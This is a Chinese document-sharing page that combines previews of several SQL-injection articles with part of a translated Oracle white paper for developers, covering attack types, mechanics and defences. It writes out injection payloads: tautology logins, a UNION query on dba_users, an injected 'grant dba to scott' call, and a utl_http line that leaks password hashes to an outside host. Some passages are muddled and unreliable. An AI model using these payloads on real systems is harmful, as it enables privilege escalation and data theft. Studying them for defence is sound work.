Oracle开发人员SQL注入攻击入门
- 格式:doc
- 大小:143.50 KB
- 文档页数:16
下载文档原格式
合集下载
SQL注入攻击是黑客对数据库进行攻击的常用手段
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。
但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。
用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。
但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况。
能不能根据具体情况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据,是高手与“菜鸟”的根本区别。
下面从SOL注入的背景讲起,再谈谈如何防御等问题。
一SQL注入攻击的背景:在计算机技术高速发展的今天,越来越让人们头疼的是面临越来越“变态”和复杂的威胁网站技术,他们利用Internet 执行各种恶意活动,如身份窃取、私密信息窃取、带宽资源占用等。
它们潜入之后,还会扩散并不断更新自己。
这些活动常常利用用户的好奇心,在用户不知道或未来允许的情况下潜入用户的PC,不知不觉中,帐户里的资金就被转移了,公司讯息也被传送出去,危害十分严重。
2006年8月16日,第一个Web威胁样本出现,截止到2006年10月25日,已经产生了第150个变种,并且,还在不断地演化下去。
网站威胁的目标定位有多个维度,是个人还是公司,还是某种行业,都有其考虑,甚至国家、地区、性别、种族、宗教等也成为发动攻击的原因或动机。
攻击还会采用多种形态,甚至是复合形态,比如病毒、蠕虫、特洛伊、间谍软件、僵尸、网络钓鱼电子邮件、漏洞利用、下载程序、社会工程、rootkit、黑客,结果都可以导致用户信息受到危害,或者导致用户所需的服务被拒绝和劫持。
sql注入的方法
sql注入的方法SQL注入是一种常见的网络攻击方式,其目的是通过特定的手段在一个网站的输入框中插入恶意SQL代码,以达到控制数据库的目的。
SQL注入攻击手段复杂多样,以下是其中几种方法:1. 基于错误的注入这种注入方式利用了注入错误的信息,导致SQL语句执行失败的原理。
攻击者可以在输入框中输入一些特殊的字符,例如单引号等,使得输入的SQL语句出现错误。
通过观察页面返回的错误信息,攻击者可以获得有用的信息,然后进一步对网站进行攻击。
2. 基于布尔的注入这种注入方式利用了布尔运算的原理,攻击者通过输入一些布尔运算符(如AND,OR),可以判断输入是否成功,并进一步了解网站的数据库结构。
3. 基于时间的注入这种注入方式利用了时间函数延迟的原理。
攻击者在SQL语句中插入时间函数并设置延迟时间,通过观察页面返回的响应时间,就可以确定输入的SQL语句是否能够执行。
4. 盲注盲注是一种比较难以检测的注入方式,攻击者无法直接获得注入结果,但可以通过不同的输入,观察页面的反应来推测数据库的结构和内容。
以上几种注入方式只是SQL注入的冰山一角,还有很多其他方法可以造成更严重的后果,例如通过注入恶意代码控制整个数据库、篡改网站页面等。
为了提高网站的安全性,我们可以采取以下措施:1. 安装安全性较高的防火墙,保障网站的数据传输安全。
2. 对网站中的所有输入进行过滤和验证,避免恶意输入。
3. 把重要的数据库文件备份,以便在数据库被攻击时能够及时恢复数据。
4. 对网站的SQL语句进行加密和脱敏,以确保敏感信息不会被窃取。
总之,SQL注入攻击是一种非常危险的行为,它可以导致严重的后果。
要防范这种攻击,我们需要了解SQL注入的各种方法和应对措施,并严格对输入进行过滤和验证。
只有这样,我们才能够保护网站的安全,为用户提供更好的服务。
sql注入攻击的原理
sql注入攻击的原理SQL注入攻击利用了应用程序未能正确过滤或转义用户输入的漏洞,从而在应用程序与数据库之间的SQL语句中插入恶意代码。
攻击者通过在用户输入的数据中添加特殊的SQL语法符号,可以修改原始的SQL查询逻辑或者执行非授权的操作。
攻击的原理是当应用程序使用拼接字符串的方式将用户输入与SQL语句进行组合时,若没有对用户输入进行合适的过滤或转义,那么攻击者就可以在用户输入中插入SQL命令,从而改变原始的SQL查询的意图。
例如,考虑一个登录页面,用户输入用户名和密码,应用程序将用户输入的用户名和密码直接拼接到SQL查询语句中,如下所示:```SELECT * FROM users WHERE username = '<user_input>' AND password = '<pass_input>'```如果应用程序没有正确过滤或转义用户输入,攻击者可以在用户名或密码字段中插入SQL命令。
例如,如果攻击者在用户名字段中输入`' OR '1'='1`,那么SQL查询语句将变成:```SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '<pass_input>'```由于`'1'='1'`始终为真,攻击者可以绕过身份验证,并获取到所有用户的记录。
SQL注入攻击也可以用于执行其他恶意操作,如数据泄露、数据库修改、执行任意操作等,具体取决于攻击者的意图和应用程序对数据库的访问权限。
为了防止SQL注入攻击,应用程序应该使用参数化查询或预编译语句来执行数据库操作,以确保用户输入被正确转义或过滤,从而防止恶意的SQL代码的注入。
此外,还应该对用户输入进行合法性验证,只接受符合预定格式的数据,以降低攻击的风险。
SQL注入攻击的种类和防范手段
SQL注入攻击的种类和防范手段1.基于错误的注入攻击:攻击者在SQL查询中插入错误或不完整的语句,以引发错误信息或日志,从而获取对数据库的相关信息。
2. 基于联合查询的注入攻击:攻击者通过在用户输入中插入union 语句,用于合并两个或多个查询结果,从而泄露数据库中的数据。
3.基于布尔查询的注入攻击:攻击者通过修改WHERE或HAVING语句中的条件,利用布尔值的真假来获取有关数据库的信息。
4.基于时间延迟的注入攻击:攻击者通过在数据库查询中添加延迟函数,如SLEEP(,使应用程序的响应时间延长,从而可以通过测量响应时间来判断条件是否成立。
5. 盲注入攻击:攻击者无法直接从Web应用程序中获取任何错误信息,但可以使用其他方式来确认注入成功,如延迟注入或二分法等方法。
防范手段:1.使用参数化查询或预编译语句:参数化查询可以防止攻击者在用户输入中插入恶意的SQL代码。
2.过滤和验证用户输入:对用户输入进行严格的过滤和验证,确保只接受合法的数据,如去除非法字符、转义特殊字符等。
3.最小权限原则:数据库用户应该具有最小的权限,只能执行必要的操作,并且不应具有直接修改数据库结构或执行系统命令的权限。
4.改变默认的数据库监听端口:将数据库的监听端口从默认的端口改为非常规的端口,可以减少被攻击的概率。
5.错误信息处理:应该避免在错误信息中透露关键的系统或数据库信息,最好将详细的错误信息记录在日志中,只向用户显示一般的错误提示信息。
6.防火墙和入侵检测系统:使用防火墙和入侵检测系统来监控和阻止潜在的SQL注入攻击。
7.定期更新和维护应用程序和数据库:及时更新和维护应用程序和数据库的补丁,以修复已知的漏洞。
8.检查第三方代码库和插件:确保使用的任何第三方代码库和插件都是受信任的,并且定期更新和审查其代码。
9.数据加密和敏感信息保护:对数据库中的敏感数据进行加密,并采取适当的措施来保护加密密钥和凭证。
综上所述,针对SQL注入攻击,我们需要综合使用多种防范手段,既包括在应用程序层面上做好安全防护,如使用参数化查询、过滤和验证用户输入,也需要在网络和基础设施层面上加强安全措施,如使用防火墙、入侵检测系统等。
sql注入攻击的基本过程
sql注入攻击的基本过程
SQL注入攻击是一种常见的网络攻击方式,攻击者通过在应用程
序中注入恶意SQL代码,从而获取敏感信息或者破坏数据库。
下面是SQL注入攻击的基本过程:
1. 收集目标信息
攻击者首先需要了解目标网站的结构和使用的数据库类型,以便
更好地准备攻击。
攻击者可以通过网络扫描工具、搜索引擎等方式来
获取这些信息。
2. 构造恶意SQL语句
攻击者在了解了目标网站的结构和数据库类型后,就可以开始构
造恶意SQL语句。
攻击者通常会在输入框等用户输入的地方注入SQL
代码,以达到获取敏感信息或者破坏数据库的目的。
3. 执行恶意SQL语句
一旦恶意SQL语句被注入到应用程序中,攻击者就可以执行这些
语句。
如果攻击成功,攻击者就可以获取敏感信息或者破坏数据库。
4. 控制应用程序
如果攻击者成功执行了恶意SQL语句,他们就可以控制应用程序,例如更改用户权限、删除数据等。
5. 隐藏攻击痕迹
攻击者通常会尽可能地隐藏攻击痕迹,以避免被发现。
他们可能
会删除或篡改日志文件,或者在攻击后将恶意SQL语句删除。
为了防止SQL注入攻击,应用程序开发人员需要采取一系列措施,例如使用参数化查询、过滤用户输入、限制数据库用户权限等。
同时,应用程序管理员需要定期检查应用程序和数据库的安全性,及时修补
漏洞。
sql注入成功的标准
sql注入成功的标准SQL注入是一种常见的网络攻击方式,攻击者利用用户输入的内容来修改、插入或删除数据库中的数据,甚至可以执行恶意代码。
成功的SQL注入攻击可以导致各种问题,包括数据泄露、数据库被劫持以及系统瘫痪等。
为了防止SQL注入,开发人员需要了解SQL注入攻击的一般原理和常见的攻击手法。
1. SQL注入攻击的原理SQL注入攻击的原理是通过将恶意代码插入到SQL查询语句中,从而改变原始查询语句的逻辑或绕过输入验证。
攻击者可以利用这种方法绕过应用程序的身份验证、执行未经授权的操作,或者获取敏感数据。
SQL注入攻击通常利用以下两种方式进行:- 输入验证不足:当应用程序没有对用户输入进行充分验证或过滤时,攻击者可以在输入中插入恶意代码。
- 拼接字符串:当应用程序使用拼接字符串的方式构建SQL 查询时,攻击者可以在字符串中插入恶意代码。
2. SQL注入成功的标准写法SQL注入的成功标准可以从两个方面来考虑:一是插入攻击代码是否能够成功执行,二是能否获取攻击者所期望的结果。
- 执行成功:SQL注入攻击的目标之一是执行恶意代码。
当攻击者能够成功向数据库服务器发送恶意代码,并且该代码能够被执行时,可以认为SQL注入攻击是成功的。
- 获取结果:SQL注入攻击的另一个目标是获取敏感信息或绕过身份验证。
当攻击者通过注入攻击成功获取到敏感数据或绕过身份验证时,可以认为SQL注入攻击是成功的。
3. SQL注入成功的攻击手法SQL注入攻击可以通过多种手法来实现。
以下是一些常见的SQL注入攻击手法:- 基于布尔的盲注:攻击者利用条件语句的真假来获取数据,逐个字符地猜测。
- 基于时间的盲注:攻击者通过插入延迟语句,利用响应时间来判断条件语句的真假。
常见的延迟函数包括`sleep()`和`benchmark()`。
- 错误信息泄露:当应用程序返回详细的错误信息时,攻击者可以利用这些信息来构造有效的注入代码。
- UNION注入:攻击者可以通过UNION操作将额外的数据行添加到查询结果中。
sql注入攻击原理
sql注入攻击原理SQL注入攻击原理SQL注入攻击是一种利用Web应用程序漏洞的技术,通过在Web应用程序的输入参数中嵌入恶意的SQL语句来执行未经授权的数据库操作。
在本文中,我们将深入探讨SQL注入攻击的原理。
一、什么是SQL注入攻击?SQL注入攻击是一种利用Web应用程序漏洞的技术,通过在Web应用程序的输入参数中嵌入恶意的SQL语句来执行未经授权的数据库操作。
这种攻击可以导致数据泄露、数据损坏和系统瘫痪等严重后果。
二、SQL注入攻击原理1. SQL语句拼接Web应用程序通常使用动态生成的SQL语句与数据库进行交互。
例如,当用户在登录页面输入用户名和密码时,Web应用程序将构建一个类似于下面这样的SQL语句:SELECT * FROM users WHERE username='admin' AND password='123456'这个查询将返回与用户名为“admin”且密码为“123456”的用户匹配的所有行。
然而,在某些情况下,Web应用程序可能会从用户输入构建动态生成的SQL查询。
例如,当用户搜索网站上的商品时,Web应用程序可能会构建一个类似于下面这样的查询:SELECT * FROM products WHERE name LIKE '%search_term%'在这个查询中,“search_term”是用户输入的搜索词。
Web应用程序将把搜索词插入到SQL查询中,以便从数据库中检索商品。
2. SQL注入漏洞SQL注入攻击利用了Web应用程序中的SQL注入漏洞。
当Web应用程序从用户输入构建动态生成的SQL查询时,如果没有正确过滤或转义用户输入,攻击者就可以在输入参数中嵌入恶意的SQL代码。
例如,假设Web应用程序使用以下代码从用户输入构建动态生成的SQL查询:$search_term = $_GET['search_term'];$query = "SELECT * FROM products WHERE name LIKE'%$search_term%'";如果攻击者在“search_term”参数中插入以下字符串:' OR 1=1 --那么生成的SQL查询将变成:SELECT * FROM products WHERE name LIKE '%' OR 1=1 -- %'这个查询将返回所有产品行,因为“OR 1=1”始终为真。
sql注入方法
sql注入方法SQL注入是常见的攻击技术之一,攻击者利用Web应用程序存在的漏洞,向数据库中插入恶意的SQL代码,以获取敏感信息、修改数据、甚至控制整个数据库的操作。
以下是几种SQL注入的方法及其防范措施:1. 基于错误的注入攻击基于错误的注入攻击利用了应用程序对SQL语句错误的处理方式,将编写的恶意SQL语句嵌入到应用程序中,导致不稳定性和错误消息。
攻击者通过错误消息获取有关数据库的详细信息。
为了阻止这种攻击,应该尽可能减少错误可见性并修复SQL语句的错误处理。
2. 布尔盲注布尔盲注是一种在没有错误信息的情况下获取数据库信息的攻击技术。
它可以使攻击者在不知道准确的数据库信息的情况下,以布尔方式测试其猜测。
为了防止这种攻击,应该使用预处理语句和参数化查询。
3. 堆叠查询堆叠查询是通过一条恶意的SQL语句执行多个查询的技术。
攻击者在一个查询中将多个语句串联起来,并将每个查询的结果存储在查询的结果中。
为了防止这种攻击,应该使用参数化查询和限制查询执行的时间。
4. 时间盲注时间盲注是一种仅限于返回时间值的注入攻击技巧。
攻击者使用`SLEEP`函数来停止查询的执行,从而确定SQL注入的成功与否。
为了阻止这种攻击,应该对输入进行过滤,并对时间延迟进行限制。
总之,SQL注入是十分常见的攻击方式,开发人员应该遵循最佳实践以防止它的发生。
首先,要实行输入验证和过滤,确保输入的数据是格式正确的;其次,要实现参数化查询和限制查询执行时间来防止攻击;最后,要限制错误消息的可见性,并尽可能减少错误。
这样就可以大大减少SQL注入攻击对系统的威胁。
sql注入攻击的常用方法
sql注入攻击的常用方法
1. 通用注释:通过添加“--”到SQL查询中终止查询,导致可能被后台程序执行的SQL语句被自动终止,此时接受的是语句的注释版本,外界在查询中添加垃圾数据。
2. OR语句利用:在SQL语句中添加 OR 语句来绕过数据库的安全性控制,利用脚本修改现有规则或将数据返回值更改为真假。
3. 绕过双引号:通过添加“\”特殊字符对输入的内容进行转义,让应用不识别双引号;也就是进行双引号的覆盖,之后应用的参数存在未经过滤的漏洞,这样就可以用SQL进行投入攻击。
如:“select * from user where name\=\"admin\"”
4. 利用拖尾空格:恶意攻击者添加空格字符,让被注入的SQL语句能够正常执行,比如输入“' and1=1 ”,这样可以避免SQL解析器将单引号作为结尾进行解析。
5. 表达式匹配:恶意攻击者会使用正则表达式来拆分SQL代码,使用“%*”模糊查询来替换原始值,利用SQL语句中的操作运算符来添加恶意信息,如:%`' OR 1=1--`
6. 数据库指令:攻击者可以使用SQL语句中的union等指令,来将恶意代码和原始数据库里的信息进行拼接,一旦这种拼接成功后,数据库就可能会被恶意攻击者获取数据。
7. 特殊函数:还有一些特殊的字段,如系统函数,比如“ifnull”、“sleep”、“rand”等,可以让攻击者让被注入的数据库服务器延时执行以达到攻击数据库的目的。
8. 无尽苦读:用一些特殊字符来组合语句,以及多次尝试,来穷举出所有可能性。
SQL注入攻击和防护技术
varchar2
authid current_user
is
pragma autonomous_transaction;
begin
execute immediate ''''grant dba to scott''''; commit;
return ''''z''''; end;'';
commit;
sys.lt.findricset(''AA.AA''''||credit.grant_dba)--'',''BBBB''); end;')
•2
Blind SQL Inject
主要通过注入的页面响应来检测是否是需要的结果,甚至可以用时间延迟的方式 来简单判断。
逻辑判断:decode|case 比如我们想得到SYS账户的Password Hash。我们可以获取password hash的每一位 字符来进行比较,正常响应表示字符匹配。 Google上存在大量的Blind SQL Inject工具来提高Bind SQL inject的效率。
•2
通过DNS服务获取信息
select utl_http.request ('http://www.'||(select password from dba_users where rownum=1)||'/' ) from dual; 具体参见后续的数据获取方式
•2
通过ldap_init获取信息
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
Oracle开发人员SQL注入攻击入门—白皮书(hawkish译)Oracle开发人员SQL注入攻击入门 (1)1、概述 (3)引言 (3)SQL注入概述 (3)SQL注入:Oracle与其他数据库的对比 (3)应用程序开发 (3)2、SQL注入 (4)引言 (4)SQL注入攻击的种类 (4)哪些易受攻击 (5)哪些不易受攻击 (5)3、SQL注入方法 (5)SQL篡改 (5)代码注入 (6)函数调用注入 (6)缓冲区溢出 (7)4、PL/SQL (8)概述 (8)即时执行语句 (8)DBMS_SQL包 (9)动态游标 (10)5、JDBC (11)概述 (11)PreparedStatement接口 (11)CallableStatement接口 (11)6、SQL攻击防护 (12)绑定变量 (12)输入有效性验证 (13)函数安全性 (13)错误信息 (13)PL/SQL方法(modplsql) (13)7、常见的特例 (14)动态表名和where语句 (14)like语句 (14)动态过程和函数调用 (14)8、Oracle函数 (15)确定函数的访问权限 (15)限制对函数的访问 (15)标准函数 (15)Oracle提供的函数 (15)用户程序函数 (16)9、参考文献 (16)1、概述引言多数应用程序开发人员低估了针对使用Oracle作为后台数据库的应用程序的SQL注入攻击的危险性。
对用户web程序的统计显示,大多数应用程序开发人员并不完全了解SQL 注入攻击的危险性,对一些用于防治攻击的简单技巧也不很了解。
本文旨在向应用程序开发人员、数据库管理员、程序审计员敲响SQL注入攻击危险性的警钟,同时证明为什么web应用程序可能受到攻击。
本文并不是作为一个执行SQL攻击的教材,也不对这些攻击行为提供指导。
SQL注入概述SQL注入攻击是用于获得数据库的未授权访问或者直接从数据库中检索数据的一种基本攻击手段。
SQL注入的基本原理很简单,各种类型的SQL攻击都很容易实施和掌握。
任何程序或软件都可能遭受SQL注入的攻击,包括通过直接数据库连接而执行的存储过程、Oracle窗体应用程序、web应用程序等。
许多标准的Oracle数据库的包都发现了大量的SQL注入攻击,比如DBMS_DA TAPUMP, DBMS_REGISTRY, and DBMS_METADA TA (查看Oracle2006一月的关键升级补丁)。
web应用程序是最易受到攻击的,因为攻击者可以执行远程SQL注入攻击而不需要任何的数据库或者程序的授权。
使用Oracle作为后台数据库的web应用程序比大多数的程序开发人员想像中更加容易受到SQL注入的攻击。
我们的程序审计发现,很多web应用程序很容易受到SQL注入的攻击,尽管在多少的web应用程序的开发阶段遵循了良好的代码编写规范。
基于函数的SQL注入攻击最让人担忧,应为这些攻击不需要人任何关于程序的相关知识,而且可以轻易的实现自动化攻击。
幸运的是,我们可以通过简单的代码实践来轻松抵挡SQL注入攻击。
然而,我们必须对任何一个传递给动态SQL语句的参数都进行有效性检测,否则就必须使用绑定变量。
SQL注入:Oracle与其他数据库的对比Oracle大体上可以很好的抵挡SQL注入攻击,因为它不支持多重SQL语句(SQL Server 和PostgreSQL支持),也没有EXCUTE语句(SQL Server有),也没有INTO OUTFILE函数(MySQL有),这些方法都经常用于发现SQL注入攻击。
另外,在Oracle环境中为了执行操作的原因而对绑定变量的使用提供了对SQL注入攻击最好的防护手段。
相对其他数据库而言,Oracle可能含有更少的攻击点,然而,基于Oracle数据库的应用程序如果没有针对各种攻击的防护措施,他们仍然很脆弱,也很容易受到通过SQL注入的而进行的攻击。
应用程序开发应用程序开发可以使用多种方法和Oracle数据库进行连接,某些方法相对其他方法更加容易受到SQL注入攻击的威胁。
本文将只对基于web应用程序常用的少量开发语言和程序架构进行关注,尽管这样,本文所讨论的技术对大多数的开发语言和程序架构都密切相关。
本文主要关注使用Java和JDBC技术连接Oracle数据库或者基于使用PL/SQL编程语言的这些应用程序。
我们相信他们是基于web、使用Oracle作为后台数据库的应用程序使用的最普遍的两种编程方法。
2、SQL注入引言SQL注入攻击在本质上很简单:攻击者希望通过向应用程序传入一个字符串来篡改SQL 语句来为自己谋利。
攻击的复杂性可能涉及到利用一个攻击者并不知道的SQL语句。
开源应用程序和与源码一起发布的商业应用程序更容易受到攻击,因为在攻击之前攻击者可以找到潜在的易受攻击的SQL语句。
SQL注入攻击的种类针对Oracle数据库的SQL注入攻击主要有下面4类:1、SQL篡改2、代码注入3、函数调用注入4.、缓冲区溢出前面两类攻击:SQL篡改和代码注入,读者应该了解,因为他们是针对所有类型数据库(包括SQL Server、MySQL、PostgreSQL和Oracle)的攻击中经常被人说起到攻击方法。
SQL篡改主要是通过使用集合操作(比如UNION)或者修改where语句来达到修改SQL 语句的目的,从而获得一个不同的返回结果。
许多记录在案的SQL注入攻击都是这种类型。
其中最出名的是通过修改用户授权的where语句来使where语句的返回值总为真。
代码注入攻击则是攻击者向SQL语句中插入新的SQL语句或者数据库命令。
典型的代码注入攻击是向一个易受攻击的SQL语句附加一个SQL 服务器的EXCUTE命令。
代码注入攻击只在数据库支持多重SQL语句的情况下才有效。
SQL Server 和PostgreSQL具有这种特性,有时候Oracle也有可能注入多重SQL语句。
Oracle的代码注入攻击主要与PL/SQL 的SQL语句动态执行功能有关。
后两类攻击则是针对Oracle数据库的特定攻击,也不是那么出名或者被列在文档中。
通过我们大量的应用程序审计,我们发现了一些易受这两类攻击的应用程序。
函数调用注入是向易受攻击的SQL语句中插入Oracle数据库函数或者用户函数。
这些函数调用可以用于执行系统调用或者控制数据库中的数据。
缓冲区溢出注入攻击时函数调用注入攻击的一个子集。
在许多商业和开源数据库中,少量数据库函数由于可能引起缓冲区溢出而受到攻击。
大多数的这些缺陷都可以有修复补丁,但还是有许多产品数据库是没有补丁可打的。
哪些易受攻击一个应用程序可能仅仅因为一个原因就可能受到SQL注入的攻击:终端用户输入的不是合法的字符串没有经过任何合法性检查就直接传给了动态SQL语句。
输入的字符串经常直接传递给SQL语句。
然而,用户的输入也可能先被存放在数据库中,之后才传给动态SQL 语句,这就是传说中的二次SQL注入。
由于许多web应用程序的无状态特性,在各个网页见通过使用其他方法可以向数据库中写数据或存储数据的情况很常见。
这种间接的攻击类型更加复杂,经常也需要对应用程序有深入的了解。
哪些不易受攻击使用绑定变量的SQL语句则基本上不会受到SQL注入攻击的威胁,因为Oracle会专有地使用绑定变量的内容而不对变量的内容进行任何的说明。
PL/SQL 和JDBC都允许使用绑定变量。
绑定变量应该得到广泛的使用,无论是安全因素还是执行效果因素。
3、SQL注入方法能够针对Oracle数据库成功进行的SQL注入攻击主要有4类。
前两类攻击:SQL篡改和代码注入比较有名,也是经常出现在文献中。
然而,函数调用注入和缓冲区溢出攻击则不是那个有名,但许多应用程序还是很容易受到他们的攻击。
这四种SQL注入攻击的方法对于其他数据库,包括SQL Server, DB2, MySQL和PostgreSQL都是有效的。
SQL篡改最常见的SQL注入攻击类型是SQL注入。
攻击者试图通过向where语句增加元素或者利用集合操作符如UNION, INTERSECT和MINUS等来扩展SQL语句的方法来修改现有的SQL语句。
可能存在很多不同的变化形式,但他们确实一些最重要的实例。
典型的SQL篡改的情况是在登录验证的过程中。
一个过于简单的web应用程序可能通过执行下面的查询并查看是否有返回一行查询结果来检查用户授权。
SELECT * FROM usersWHERE username = 'bob' and PASSWORD = 'mypassword' 一个攻击者可能试图篡改SQL语句并执行下面的语句:SELECT * FROM usersWHERE username = 'bob' and PASSWORD = 'mypassword' or 'a' = 'a' 根据操作符的优先级,对于任意一个元组where语句都是真,从而攻击者已经获得程序的访问权限。
集合操作符UNION在SQL攻击中经常被使用到。
目标是控制SQL语句来获取另外一张数据表中的元组。
一个网页窗口可能执行下面的语句来获得所有可获取商品的列表:SELECT product_name FROM all_productsWHERE product_name like '%Chairs%'一个攻击者可能试图篡改SQL语句并执行下面的语句:SELECT product_name FROM all_productsWHERE product_name like '%Chai rs'UNIONSELECT username FROM dba_usersWHERE username like' %'返回给web窗口的结果列表不但包括了所选择出来的商品,也包括了所有的数据库用户名。
代码注入代码注入攻击试图向已有的SQL语句中增加额外的SQL语句或者命令。
这个类型的攻击经常是针对微软的SQL Server,而很少对Oracle数据库有效。
SQL Server里的EXCUTE 语句经常是SQL注入攻击的目标,而Oracle里则没有相应的语句。
在PL/SQL 和Java里,Oracle对单个的数据库查询并不支持多重SQL语句。
因此,下面的这个常见的SQL注入攻击对于通过PL/SQL 或者Java 方式的Oracle数据库是没有效的。
下面的语句执行后会导致一个错误的发生。
SELECT * FROM usersWHERE username = 'bob' and PASSWORD = 'mypassword'; DELETE FROM usersWHERE username = 'admin';然而,许多编程语言或者API允许多重SQL语句的执行。